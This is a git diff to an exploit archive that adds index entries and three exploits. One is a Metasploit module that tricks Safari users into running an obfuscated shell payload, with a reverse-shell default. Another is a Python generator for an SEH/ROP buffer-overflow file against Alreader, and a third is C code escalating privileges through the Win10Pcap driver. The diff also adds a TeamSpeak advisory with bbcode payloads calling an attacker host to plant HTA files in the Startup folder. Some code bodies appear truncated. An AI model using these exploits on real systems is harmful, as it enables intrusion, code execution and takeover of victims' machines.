diff --git a/files.csv b/files.csv
index 0e2b8b28c..908d9c7ca 100755
--- a/files.csv
+++ b/files.csv
@@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
+38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
@@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
+38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
+38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
diff --git a/platforms/osx/remote/38535.rb b/platforms/osx/remote/38535.rb
new file mode 100755
index 000000000..5324385c8
--- /dev/null
+++ b/platforms/osx/remote/38535.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Safari User-Assisted Applescript Exec Attack',
+ 'Description' => %q{
+ In versions of Mac OS X before 10.11.1, the applescript:// URL
+ scheme is provided, which opens the provided script in the Applescript
+ Editor. Pressing cmd-R in the Editor executes the code without any
+ additional confirmation from the user. By getting the user to press
+ cmd-R in Safari, and by hooking the cmd-key keypress event, a user
+ can be tricked into running arbitrary Applescript code.
+
+ Gatekeeper should be disabled from Security & Privacy in order to
+ avoid the unidentified Developer prompt.
+ },
+ 'License' => MSF_LICENSE,
+ 'Arch' => ARCH_CMD,
+ 'Platform' => ['unix', 'osx'],
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ },
+ 'Targets' =>
+ [
+ [ 'Mac OS X', {} ]
+ ],
+ 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Oct 16 2015',
+ 'Author' => [ 'joev' ],
+ 'References' =>
+ [
+ [ 'CVE', '2015-7007' ],
+ [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
+ ],
+ 'BrowserRequirements' => {
+ :source => 'script',
+ :ua_name => HttpClients::SAFARI,
+ :os_name => OperatingSystems::Match::MAC_OSX
+ }
+ ))
+
+ register_options([
+ OptString.new('CONTENT', [false, "Content to display in browser",
+ "This page has failed to load. Press cmd-R to refresh."]),
+ OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+ ], self.class)
+ end
+
+ def on_request_exploit(cli, request, profile)
+ print_status("Sending #{self.name}")
+ send_response_html(cli, exploit_html)
+ end
+
+ def exploit_html
+ "#{content}"
+ end
+
+ def exploit_js
+ js_obfuscate %Q|
+ var as = Array(150).join("\\n") +
+ 'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
+ var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
+ window.onkeydown = function(e) {
+ if (e.keyCode == 91) {
+ window.location = url;
+ }
+ };
+ |
+ end
+
+ def sh
+ 'killall "Script Editor"; nohup ' + payload.encoded
+ end
+
+ def content
+ datastore['CONTENT']
+ end
+
+
+end
\ No newline at end of file
diff --git a/platforms/windows/local/38532.py b/platforms/windows/local/38532.py
new file mode 100755
index 000000000..2c2f80a14
--- /dev/null
+++ b/platforms/windows/local/38532.py
@@ -0,0 +1,463 @@
+#!/usr/bin/env python
+
+#*************************************************************************************************************
+# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
+# Date: 25.10.2015
+# Category: Local Exploit
+# Exploit Author: g00dv1n
+# Contact: g00dv1n.private@gmail.com
+# Version: 2.5
+# Tested on: Windows XP SP3 / Windows 7 / Windows 8
+# Vendor Homepage: http://www.alreader.com/index.php?lang=en
+# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
+# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
+# CVE:
+
+
+
+# Description:
+# Alreader 2.5 its free FB2 reader for Windows.
+# FB2 format its just XML. FB2 contain block.
+# Overflow occurs if you create a long name of the author.
+# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
+# For example 41 41 - 00 41 00 41
+# So We should use UTF-16.
+#
+# Also, we can use single null byte in payload.
+#
+#
+#
+# Instructions:
+# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
+# 2. Run Alreader.exe
+# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
+# 4. Enjoy running Calc.exe
+#
+# Exploit owerview:
+# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
+# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
+# run Shellcode.
+#
+# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
+# ( It is necessary to adjust the offset in different systems .)
+# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
+# ( It is necessary to adjust the offset in different systems .)
+# Then the control get ROP chain .
+#
+# Program have Russian (RU) and English (Eng) versions.
+# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
+# For a combination of two versions into one exploit I place two ROP chains one after another.
+# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
+# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
+# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
+# With these tricks, the exploit works correctly for both versions.
+#
+# Below is ANSI-diagram of the payload:
+#
+# =-------------------------=
+# | gdvn | just fan magic bytes
+# |-------------------------|
+# | |
+# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
+# | | (ADD ESP, 808h RETN 4)
+# |-------------------------|
+# | |
+# | ROP NOP | x 500 Spray ROP NOP (RETN)
+# | |
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | RU version |
+# | |
+# |-------------------------|
+# | SHELLCODE | Run Calc.exe
+# |-------------------------|
+# | |
+# | ROP NOP | x 250 Spray ROP NOP (RETN)
+# | |
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | ENG version |
+# | |
+# |-------------------------|
+# | SHELLCODE | Run Calc.exe
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | ENG version |
+# | |
+# |-------------------------|
+# | |
+# | |
+# | Junk | 'A' x 6000
+# | |
+# | |
+# =-------------------------=
+#
+#
+#
+#
+#
+#**************************************************************************************************************
+
+
+
+
+#######################################################################################################
+from struct import *
+
+#######################################################################################################
+file_result = "AlReader-fb2-PoC-exploit.fb2"
+
+
+########################################################################################################
+
+fuz_text = '' # init fuzzy string
+
+
+
+
+jmp_to = pack('
+
+
+
+
+
+ '''
+
+end = '''
+
+
+
+ EXPLOIT TEST
+
+
+
+'''
+start_u = start.encode('utf-16')
+
+end_u = end.encode('utf-16')
+
+fout = open(file_result, 'wb')
+fout.write(start_u)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(fuz_text)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(end_u)
+fout.close()
+
+
+print "[*] File successfully created !!\n\n"
\ No newline at end of file
diff --git a/platforms/windows/local/38533.c b/platforms/windows/local/38533.c
new file mode 100755
index 000000000..dc3cb2161
--- /dev/null
+++ b/platforms/windows/local/38533.c
@@ -0,0 +1,193 @@
+## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+
+/* found with :
+!token
+1: kd> dt nt!_OBJECT_HEADER
+ +0x000 PointerCount : Int4B
+ +0x004 HandleCount : Int4B
+ +0x004 NextToFree : Ptr32 Void
+ +0x008 Lock : _EX_PUSH_LOCK
+ +0x00c TypeIndex : UChar
+ +0x00d TraceFlags : UChar
+ +0x00e InfoMask : UChar
+ +0x00f Flags : UChar
+ +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+ +0x010 QuotaBlockCharged : Ptr32 Void
+ +0x014 SecurityDescriptor : Ptr32 Void
+ +0x018 Body : _QUAD
+
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN 0x5
+
+
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
+(SYSTEM_INFORMATION_CLASS)16;
+
+// The NtQuerySystemInformation function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+ IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ OUT PVOID SystemInformation,
+ IN ULONG SystemInformationLength,
+ OUT PULONG ReturnLength OPTIONAL
+ );
+
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE
+{
+ ULONG ProcessId;
+ UCHAR ObjectTypeNumber;
+ UCHAR Flags;
+ USHORT Handle;
+ PVOID Object;
+ ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ ULONG NumberOfHandles;
+ SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation =
+(FILE_INFORMATION_CLASS)9;
+
+// The NtQueryInformationFile function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+ IN HANDLE FileHandle,
+ OUT PIO_STATUS_BLOCK IoStatusBlock,
+ OUT PVOID FileInformation,
+ IN ULONG Length,
+ IN FILE_INFORMATION_CLASS FileInformationClass
+ );
+
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+ ULONG FileNameLength;
+ WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+
+void* FindTokenAddressHandles(ULONG pid)
+{
+ /////////////////////////////////////////////////////////////////////////
+ // Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+ //
+
+ // The functions have no associated import library. You must use the
+ // LoadLibrary and GetProcAddress functions to dynamically link to
+ // ntdll.dll.
+
+ HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+ assert(hNtDll != NULL);
+
+ PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
+ (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
+ "NtQuerySystemInformation");
+ assert(NtQuerySystemInformation != NULL);
+
+
+ /////////////////////////////////////////////////////////////////////////
+ // Get system handle information.
+ //
+
+ DWORD nSize = 4096, nReturn;
+ PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+ HeapAlloc(GetProcessHeap(), 0, nSize);
+
+ // NtQuerySystemInformation does not return the correct required buffer
+ // size if the buffer passed is too small. Instead you must call the
+ // function while increasing the buffer size until the function no longer
+ // returns STATUS_INFO_LENGTH_MISMATCH.
+ while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
+ nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+ nSize += 4096;
+ pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+ GetProcessHeap(), 0, nSize);
+ }
+
+ for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+ {
+
+ PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+
+ if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+ {
+ printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+ return pHandle->Object;
+ }
+ }
+
+ /////////////////////////////////////////////////////////////////////////
+ // Clean up.
+ //
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+
+ return 0;
+}
+
+void main()
+{
+ DWORD dwBytesReturned;
+ DWORD ShellcodeFakeMemory;
+ HANDLE token;
+
+
+ // first create toke handle so find object address with handle
+ if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+ DebugBreak();
+
+ void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+
+ CloseHandle(token);
+
+ // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
+ HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+ if(hDriver!=INVALID_HANDLE_VALUE)
+ {
+ fprintf(stderr," Open Driver OK\n");
+
+ if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+ {
+ fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+ return;
+ }
+ else fprintf(stderr," Send IOCTL OK\n");
+ }
+
+ else
+ {
+ fprintf(stderr," Open Driver error %d.\n",GetLastError());
+ return;
+ }
+
+
+ CloseHandle(hDriver);
+ getchar();
+
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt
new file mode 100755
index 000000000..496bca28a
--- /dev/null
+++ b/platforms/windows/remote/38513.txt
@@ -0,0 +1,132 @@
+Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
+Date: 12/10/2015
+Author: Scurippio / (0x6FB30B11 my pgp keyid)
+Vendor Homepage: https://www.teamspeak.com/
+Application: TeamSpeak 3
+Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1
+Platforms: Windows, Mac OS X and Linux
+Exploitation: Remote
+Risk : Very High
+
+=========
+The Bug
+=========
+
+The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution.
+By changing the channel description you can insert a [img] bb tag with malicious content.
+
+There are a few problems with the image caching on disk.
+
+1: There is no check on file extension.
+
+2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc.
+
+ Example:
+
+ [img] http://yourevilhost.com/thefile.hta [/img]
+ [img] http://yourevilhost.com/thefile.msi [/img]
+ [img] http://yourevilhost.com/thefile.vbs [/img]
+ ...
+
+3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
+
+ Example:
+
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
+ ...
+
+4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
+This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
+
+ Example:
+
+ [img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
+
+If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
+
+The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
+
+==========================================
+Bypass / Vector / Payload
+==========================================
+To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
+
+ Example:
+
+ RewriteEngine On
+ RewriteCond %{REQUEST_URI} !/faker.php
+ RewriteRule .* /faker.php
+
+Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
+
+ Example:
+
+
+
+
+ PWN3D
+
+
+
+
+
+
+If you save the file in the windows startup directory you can achieve a remote code execution.
+
+ Example:
+
+ [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+ [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+
+The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
+At the next OS boot the victim will execute the malicious HTA file.
+
+=======
+Fix
+=======
+
+Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
+
+======
+Info
+======
+
+10/20/2015 - I have reported this Vulnerability to Teamspeak developers team
+
+********* - Release the public exploit
+
+- Fuck the 'Captatori' - Tracciabili
+
+(Snappy is always with you :P )
+
+
+Copyright (c) 2015 Scurippio
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.